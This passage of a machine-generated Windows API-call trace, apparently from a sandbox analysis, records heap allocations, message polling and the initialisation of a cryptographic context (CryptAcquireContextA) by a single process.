lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0259.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.619] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.619] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.620] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0259.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e38 [0259.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0259.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0259.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0259.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0259.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0259.620] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0259.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.620] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0259.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0259.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0259.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.621] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.621] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.622] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0259.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0259.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.622] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.622] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.622] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0259.623] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0259.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0259.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0259.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0259.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69888, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0259.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.623] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0259.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0259.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0259.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0259.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0259.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.627] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0259.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0259.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0259.627] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0259.628] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0259.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fc8 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0259.628] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0259.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0259.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.628] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0259.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0259.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0259.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.629] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0259.629] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0259.629] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0259.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.629] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.629] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0259.629] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 